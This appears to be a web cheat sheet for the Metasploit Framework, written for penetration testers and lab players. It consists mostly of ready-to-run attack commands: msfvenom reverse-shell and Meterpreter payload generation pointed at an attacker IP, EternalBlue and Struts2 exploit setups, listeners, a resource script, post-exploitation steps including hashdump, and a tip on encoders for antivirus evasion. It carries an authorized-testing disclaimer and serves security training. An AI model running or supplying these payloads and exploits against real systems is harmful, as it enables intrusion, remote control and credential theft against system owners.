CyberCheatsheets

Metasploit Framework Cheat Sheet

Modular exploitation framework for scanning, exploiting, and post-exploitation with msfconsole, handlers, and msfvenom.

Exploitation & PayloadsexploithandlermsfconsolemsfvenompayloadUpdated 2026-06-02

Overview

Metasploit Framework provides exploits, auxiliary modules, encoders, and payloads. msfconsole is the interactive CLI; msfvenom generates standalone payloads; exploit/multi/handler catches reverse connections. Use after service enumeration when you have a matching module or need staged shells.

Authorized testing only. Use only on systems, networks, and accounts you own or have explicit written permission to test. Unauthorized access is illegal.

Install

Kali / Parrot (preinstalled)

which msfconsole

Ubuntu — Rapid7 installer

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb -o msfinstall
chmod +x msfinstall && sudo ./msfinstall

Start PostgreSQL (required for db features)

sudo systemctl start postgresql
msfdb init

Essential commands

Interactive console

msfconsole -q

Search modules

msfconsole -q -x "search type:exploit platform:linux smb; exit"

Generate payload (msfvenom)

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f elf -o shell.elf
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -f exe -o rev.exe

List encoders / formats

msfvenom --list payloads | grep meterpreter
msfvenom --list formats

Inside msfconsole —

search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
check
run -j

Database / workspace

workspace -a client_a
hosts -a 192.168.1.0/24
services -p 445

Common workflows

Terminal 1 — listener

msfconsole -q -x "use exploit/multi/handler; set payload linux/x64/shell_reverse_tcp; set LHOST 0.0.0.0; set LPORT 4444; run"

Or interactively

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 443
set ExitOnSession false
run -j

Exploit + payload in one session —

use exploit/multi/http/struts2_content_type_ognl
set RHOSTS target.htb
set RPORT 8080
set TARGETURI /
set payload linux/x64/meterpreter/reverse_tcp
set LHOST tun0
set LPORT 4444
run

After session opens

sessions -l
sessions -i 1

In meterpreter

sysinfo
getuid
hashdump
upload /local/path/tool.exe C:\\Windows\\Temp\
shell
background

Generate staged Windows HTTPS meterpreter

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.14.5 LPORT=443 -e x64/xor_dynamic -i 3 -f exe -o payload.exe

Handler must use same payload

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_https
set LHOST 10.10.14.5
set LPORT 443
run

exploit.rc

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.50
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.5
set LPORT 4444
run
msfconsole -q -r exploit.rc

Flags reference

msfconsole -q

Quiet banner

msfconsole -r file.rc

Run resource script

search type:exploit cve:2021

Filter module search

show targets

Compatible target indexes

setg LHOST ip

Global option for all modules

run -j

Run as background job

msfvenom -a x64 --platform windows

Architecture / platform

msfvenom -f raw

Output format (elf, exe, ps1, etc.)

Tips

  • Always pair msfvenom payload type with handler payload exactly (staged vs stageless matters).
  • Use check before run when the module supports it to avoid crashing services.
  • setg LHOST on your VPN interface (e.g. tun0) saves time in labs.
  • For AV evasion, try encoders sparingly; modern EDR often flags msfvenom defaults — custom loaders may be required.
  • db_nmap imports Nmap results: db_nmap -sV 10.10.10.0/24 then services.

References

Aide-mémoires similaires